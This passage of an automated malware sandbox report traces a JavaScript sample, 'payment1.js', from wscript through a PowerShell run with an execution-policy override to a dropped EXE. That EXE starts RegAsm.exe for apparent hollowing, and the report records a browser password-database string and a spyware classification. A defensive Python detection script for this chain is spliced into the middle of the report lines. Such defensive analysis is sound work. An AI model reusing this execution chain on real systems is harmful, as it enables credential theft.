                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B54750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BDE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B21460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BCD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BF0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B30535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BCDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B75AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BDDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B6DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B5E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B9D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B32840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BFA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B46962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B39950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B39EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B42E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B30E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B31F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B22FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B50F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B72F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BD0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B20CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BEFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BA9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B30C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B48DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B2ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B4FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B3AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02BE1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B33D40
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0326EA03
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0327702E
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03277033
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_032708A3
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0326E8B3
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_032648DB
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03270683
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0328F4C3
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0377D34C
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_038503E6
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0379E3F0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0384132D
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0384A352
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037D739A
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_038312ED
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037AD2F0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037AB2C0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037952A0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03830274
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0377F172
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_037C516C
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_038501AA
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_038481CC
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_03780100
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0382A118
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0379B1B0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0385B16B
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0383F0CC
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_0384F0E0
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Code function: 10_2_038470E9
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037970C010_2_037970C0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379077010_2_03790770
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037B475010_2_037B4750
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384F7B010_2_0384F7B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378C7C010_2_0378C7C0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038416CC10_2_038416CC
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AC6E010_2_037AC6E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0385059110_2_03850591
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0382D5B010_2_0382D5B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379053510_2_03790535
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384757110_2_03847571
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378146010_2_03781460
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0383E4F610_2_0383E4F6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384F43F10_2_0384F43F
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384244610_2_03842446
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03846BD710_2_03846BD7
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037CDBF910_2_037CDBF9
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384AB4010_2_0384AB40
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FB7610_2_0384FB76
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AFB8010_2_037AFB80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0382DAAC10_2_0382DAAC
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0383DAC610_2_0383DAC6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03847A4610_2_03847A46
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FA4910_2_0384FA49
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037D5AA010_2_037D5AA0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03803A6C10_2_03803A6C
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378EA8010_2_0378EA80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037A696210_2_037A6962
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0385A9A610_2_0385A9A6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379995010_2_03799950
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AB95010_2_037AB950
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037929A010_2_037929A0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379284010_2_03792840
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379A84010_2_0379A840
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037BE8F010_2_037BE8F0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037938E010_2_037938E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037768B810_2_037768B8
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FFB110_2_0384FFB1
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037B0F3010_2_037B0F30
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FF0910_2_0384FF09
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03782FC810_2_03782FC8
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03804F4010_2_03804F40
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03791F9210_2_03791F92
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384CE9310_2_0384CE93
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03790E5910_2_03790E59
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384EEDB10_2_0384EEDB
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384EE2610_2_0384EE26
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03799EB010_2_03799EB0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037A2E9010_2_037A2E90
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03793D4010_2_03793D40
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379AD0010_2_0379AD00
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378ADE010_2_0378ADE0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AFDC010_2_037AFDC0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037A8DBF10_2_037A8DBF
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03841D5A10_2_03841D5A
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03847D7310_2_03847D73
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03830CB510_2_03830CB5
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FCF210_2_0384FCF2
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03790C0010_2_03790C00
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03780CF210_2_03780CF2
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03809C3210_2_03809C32
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0306220010_2_03062200
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305130810_2_03051308
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305D2D010_2_0305D2D0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305B2E010_2_0305B2E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305D0B010_2_0305D0B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305B42410_2_0305B424
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0305B43010_2_0305B430
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03063A5B10_2_03063A5B
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03063A6010_2_03063A60
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0306586010_2_03065860
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0307BEF010_2_0307BEF0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365E3F810_2_0365E3F8
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365E51410_2_0365E514
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365CBC110_2_0365CBC1
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365EA4110_2_0365EA41
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365D97810_2_0365D978
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365E8BA10_2_0365E8BA
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365CC0810_2_0365CC08
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 037FEA12 appears 84 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 037C5130 appears 36 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 0380F290 appears 103 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 0377B970 appears 248 times
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: String function: 037D7E54 appears 85 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02BAF290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B1B970 appears 250 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B77E54 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B65130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02B9EA12 appears 86 times
                Source: payment1.js | Initial sample: Strings found which are bigger than 50
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: x.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RegAsm.exe, 00000005.00000002.2105587672.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: n_ip_tcpBS;.VBpp
                Source: RegAsm.exe, 00000005.00000002.2105587672.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BS;.VBp
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@14/8@6/6
                Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\popo[1].ps1
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
                Source: C:\Windows\System32\wscript.exe | File created: C:\Temp\dddddd.ps1
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: MRINFO.EXE, 0000000A.00000003.2303996787.0000000003364000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2988076296.0000000003364000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: payment1.js | Virustotal: Detection: 16%
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payment1.js"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Process created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
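The "Process created" records above form a single chain: a script host runs PowerShell with an execution-policy override on a file in C:\Temp, PowerShell drops and starts an EXE from %TEMP%, that EXE starts RegAsm.exe twice with no arguments (the usual target for a .NET loader that hollows a signed Microsoft binary), and later a process from a long random directory under Program Files starts a SysWOW64 network tool which in turn launches Firefox. The following is an added example of how a detection engineer would encode that chain as parent/child rules over process-creation telemetry; it is not Joe Sandbox code. The events are constructed from the report lines, the PIDs are invented, and the parent of sxkv2RIDKUVCF4X010eCnC.exe is not recorded in this excerpt, so it is left unattached.

```python
"""Triage a process tree for the script-to-injection chain recorded above.

Added example, not part of Joe Sandbox or the report. EVENTS mirrors the
"Process created" lines; PIDs are invented and the parent of
sxkv2RIDKUVCF4X010eCnC.exe is unknown in this excerpt (ppid 0).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# .NET SDK utilities that loaders commonly start suspended and hollow out.
DOTNET_HOLLOW_TARGETS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
BROWSER_PARENTS_OK = {"explorer.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
TEMP_RE = re.compile(r'\\AppData\\Local\\Temp\\|(?:^|[\s"])C:\\Temp\\|\\Windows\\Temp\\', re.I)
# -ExecutionPolicy may be abbreviated to any unique prefix such as -ex or -ep.
POLICY_RE = re.compile(r"-(?:ex\w*|ep)\s+(?:bypass|unrestricted|remotesigned)", re.I)
# A long random alphanumeric directory directly under Program Files.
RANDOM_DIR_RE = re.compile(r"^C:\\Program Files( \(x86\))?\\[A-Za-z0-9]{24,}\\", re.I)
HAS_ARGS_RE = re.compile(r'\.exe"?\s+\S', re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
FAKE = r"C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe"
EVENTS = [  # (pid, ppid, image, command line), constructed from the report
    (100, 1, r"C:\Windows\System32\wscript.exe", r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\payment1.js"'),
    (101, 100, PS, f'"{PS}" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"'),
    (102, 101, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (103, 101, r"C:\Users\user\AppData\Local\Temp\x.exe", r'"C:\Users\user\AppData\Local\Temp\x.exe"'),
    (104, 103, REGASM, f'"{REGASM}"'),
    (105, 103, REGASM, f'"{REGASM}"'),
    (106, 0, FAKE, f'"{FAKE}"'),  # parent not recorded in the report excerpt
    (107, 106, r"C:\Windows\SysWOW64\MRINFO.EXE", r'"C:\Windows\SysWOW64\MRINFO.EXE"'),
    (108, 107, r"C:\Program Files\Mozilla Firefox\firefox.exe", r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events) -> Dict[int, Proc]:
    return {pid: Proc(pid, ppid, image, cmd) for pid, ppid, image, cmd in events}


def chain(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Image names from the oldest known ancestor down to pid."""
    names, seen = [], set()
    p = procs.get(pid)
    while p and p.pid not in seen:
        seen.add(p.pid)
        names.append(basename(p.image))
        p = procs.get(p.ppid)
    return names[::-1]


def triage(procs: Dict[int, Proc]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for every parent/child relation that matches a rule."""
    hits = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        name = basename(p.image)
        pname = basename(parent.image) if parent else ""
        if pname in SCRIPT_HOSTS and name == "powershell.exe" and (POLICY_RE.search(p.cmdline) or TEMP_RE.search(p.cmdline)):
            hits.append((p.pid, "script_host_spawns_powershell_with_policy_override"))
        if pname == "powershell.exe" and TEMP_RE.search(p.image):
            hits.append((p.pid, "powershell_launches_exe_from_temp"))
        # RegAsm.exe with an empty command line, started by an EXE in a temp directory.
        if name in DOTNET_HOLLOW_TARGETS and parent and TEMP_RE.search(parent.image) and not HAS_ARGS_RE.search(p.cmdline):
            hits.append((p.pid, "dotnet_utility_started_without_args_by_temp_exe"))
        if parent and RANDOM_DIR_RE.search(parent.image) and "\\syswow64\\" in p.image.lower():
            hits.append((p.pid, "random_dir_process_spawns_syswow64_binary"))
        if name == "firefox.exe" and parent and pname not in BROWSER_PARENTS_OK:
            hits.append((p.pid, "browser_launched_by_unexpected_parent"))
    return hits


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    for pid, rule in triage(tree):
        print(f"{rule}: {' -> '.join(chain(tree, pid))}")
```

The empty-argument check matters: RegAsm.exe started by an installer carries an assembly path, while a hollowing target is created suspended with nothing but its own path, exactly as in the two RegAsm.exe records above. The random-directory rule is deliberately narrow (24+ alphanumeric characters directly under Program Files) so that ordinary vendor folders do not match.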
                Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, msxml3.dll, wininet.dll, mlang.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (twice), wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Sections loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll
